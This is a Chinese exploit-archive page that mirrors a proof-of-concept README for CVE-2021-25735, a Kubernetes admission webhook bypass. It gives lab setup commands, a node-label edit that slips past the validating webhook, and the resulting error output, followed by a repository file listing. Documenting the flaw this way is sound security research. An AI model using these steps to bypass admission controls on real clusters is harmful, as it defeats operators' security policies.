支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%
立即捐款

POC详情: c56f6793de8506f85dec651ede1a6f8a82a07077

来源
https://github.com/darryk10/CVE-2021-25735
关联漏洞
标题:Kubernetes SIGs kube-apiserver 安全漏洞 (CVE-2021-25735)
Description:Kubernetes SIGs kube-apiserver是Kubernetes SIGs开源的一个应用软件。验证并配置api对象的数据,这些对象包括容器,服务,复制控制器等。 Kubernetes SIGs kube-apiserver 存在安全漏洞,该漏洞允许节点更新绕过一个验证接纳的Webhook。
Description
Exploit CVE-2021-25735: Kubernetes Validating Admission Webhook Bypass
介绍
# CVE-2021-25735
## Exploit CVE-2021-25735: Kubernetes Validating Admission Webhook Bypass

### Set the Vulnerable Environment

Let's start with running the script gencerts.sh to generate TLS certificates and keys. \
` bash gencerts.sh`

To deploy the admission controller you need to build the Docker container image locally, tag, and push the image to your Dockerhub using the below commands.\
`docker login` \
`docker build -t validationwebhook:1.0 .` \
`docker tag validationwebhook:1.0 darryk/dev:1.0` \
`docker push darryk/dev:1.0`

Now you can deploy the created image with the Node.js application into your K8s cluster. The webhook-deploy.yaml will deploy all the needed components in your cluster. \
`kubectl apply -f webhook-deploy.yaml`

Let's now register our webhook with Kubernetes API Server. To do that, we create a Base64 of the ca.crt file created before and replace the CA_BUNDLE inside webhook-registration.yaml. \
`cat ca.crt | base64`

Finally, we will register the webhook with the Kubernetes API Server. \
`kubectl apply -f webhook-registration.yaml`


### Exploit CVE-2021-25735

We do a change in the node label using edit nodes and we add a new label.\
`kubectl edit nodes ip-172-20-61-82.ec2.internal`

```
  labels:  
    test: test  
    changeAllowed: "false"
```

Since the ChangeAllowed is set to "false" we get the following error:
> error: nodes "ip-172-20-46-130.ec2.internal" could not be patched: admission webhook "validationwebhook.validationwebhook.svc" denied the request: Validation failed
> You can run `kubectl replace -f /tmp/kubectl-edit-irc64.yaml` to try this update again.

If we retry to modify the node performing the following change:\
```
  labels:  
    test: test  
    changeAllowed: "true"
```

In this case the edit action has been accepted bypassing the admission controller.
文件快照

 [4.0K]  /data/pocs/c56f6793de8506f85dec651ede1a6f8a82a07077
├── [4.0K]  app
│   ├── [ 362]  package.json
│   ├── [ 14K]  package-lock.json
│   └── [1.4K]  server.js
├── [  17]  ca.srl
├── [ 233]  Dockerfile
├── [ 494]  gencerts.sh
├── [1.0K]  LICENSE
├── [1.8K]  README.md
├── [ 725]  webhook-deploy.yaml
└── [1.8K]  webhook-registration.yaml

1 directory, 10 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。